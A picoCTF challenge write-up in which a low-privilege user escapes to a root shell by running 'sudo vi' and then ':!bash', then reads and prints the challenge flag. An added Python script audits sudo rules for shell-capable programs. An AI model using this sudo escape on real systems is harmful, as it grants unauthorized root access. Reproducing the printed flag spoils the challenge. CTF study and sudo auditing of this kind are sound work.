Permissions

  • Description: Can you read files in the root file?
  • Difficulty: Medium

🔎 Solution

The objective of this challenge is to gain sufficient privileges to access the /root directory.

After connecting to the target, we navigate to / and run ls -la to inspect detailed permissions of files and directories.

picoplayer@challenge:/$ ls -la
total 0
drwxr-xr-x 1 root root 51 Aug 13 05:35 .
drwxr-xr-x 1 root root 51 Aug 13 05:35 ..
-rwxr-xr-x 1 root root 0 Aug 13 05:35 .dockerenv
lrwxrwxrwx 1 root root 7 Mar 8 2023 bin -> usr/bin
drwxr-xr-x 2 root root 6 Apr 15 2020 boot
d--------- 1 root root 27 Aug 4 2023 challenge
drwxr-xr-x 5 root root 340 Aug 13 05:35 dev
drwxr-xr-x 1 root root 66 Aug 13 05:35 etc
drwxr-xr-x 1 root root 24 Aug 4 2023 home
lrwxrwxrwx 1 root root 7 Mar 8 2023 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Mar 8 2023 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Mar 8 2023 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Mar 8 2023 libx32 -> usr/libx32
drwxr-xr-x 2 root root 6 Mar 8 2023 media
drwxr-xr-x 2 root root 6 Mar 8 2023 mnt
drwxr-xr-x 2 root root 6 Mar 8 2023 opt
dr-xr-xr-x 286 nobody nogroup 0 Aug 13 05:35 proc
drwx------ 1 root root 23 Aug 4 2023 root
drwxr-xr-x 1 root root 54 Aug 13 05:35 run
lrwxrwxrwx 1 root root 8 Mar 8 2023 sbin -> usr/sbin
drwxr-xr-x 2 root root 6 Mar 8 2023 srv
dr-xr-xr-x 13 nobody nogroup 0 Aug 13 05:35 sys
drwxrwxrwt 1 root root 6 Aug 4 2023 tmp
drwxr-xr-x 1 root root 18 Mar 8 2023 usr
drwxr-xr-x 1 root root 17 Mar 8 2023 var

The /root directory is owned by root with rwx------ permissions, meaning only the root user can access it, while the group and others have no permissions at all. Since our current user is picoplayer, we cannot enter /root directly.

Running sudo -l shows that picoplayer is allowed to run /usr/bin/vi through sudo, and the (ALL) run-as specification includes root. This can be leveraged to spawn a root shell.

picoplayer@challenge:/$ sudo -l
Matching Defaults entries for picoplayer on challenge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi

From picoplayer, we execute:

sudo vi

Inside vi, we enter:

:!bash

The :! command in vi runs a shell command from inside the editor. Because vi was started through sudo and is running as root, the bash process it launches is a root shell.

With root privileges, we can now access /root and retrieve the contents of the flag file.

root@challenge:~# ls -la
total 12
drwx------ 1 root root 23 Aug 4 2023 .
drwxr-xr-x 1 root root 51 Aug 13 05:35 ..
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 35 Aug 4 2023 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
root@challenge:~# cat .flag.txt
picoCTF{uS1ng_v1m_3dit0r_89e9cf1a}
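
From the defender's side, the same sudo -l output can be audited for rules like the one used above. The following is an added example, not part of the original write-up: the SHELL_CAPABLE set, the reason strings and the function name are assumptions made for illustration, and the parser assumes tags such as NOEXEC: appear only at the start of a rule line.

```python
import os
import re

# Assumption: a short, non-exhaustive set of programs that can start a shell
# or another command from inside their own interface (editors, pagers).
SHELL_CAPABLE = {"vi", "vim", "view", "less", "more", "man"}

# Constructed sample: the `sudo -l` output from the write-up above.
SAMPLE = r"""Matching Defaults entries for picoplayer on challenge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi
"""

# "(runas) [TAG: ...] command[, command ...]" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return (runas, command, reason) for each rule worth reviewing."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything before this is Defaults output
            continue
        match = RULE.match(line) if in_rules else None
        if not match:
            continue
        tags = {t.strip() for t in match["tags"].split(":") if t.strip()}
        for cmd in (c.strip() for c in match["cmds"].split(",")):
            if cmd == "ALL":
                findings.append((match["runas"], cmd, "unrestricted rule"))
            elif not cmd:
                continue
            elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE and "NOEXEC" not in tags:
                # NOEXEC stops the program from running further commands;
                # sudoedit is the narrower choice when the goal is editing a file.
                findings.append((match["runas"], cmd, "shell-capable, no NOEXEC"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE):
        print(f"review: ({runas}) {cmd}: {reason}")
```

A rule written as NOEXEC: /usr/bin/less or as sudoedit with an explicit file path is not flagged by this check.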

🚩 Flag

picoCTF{uS1ng_v1m_3dit0r_89e9cf1a}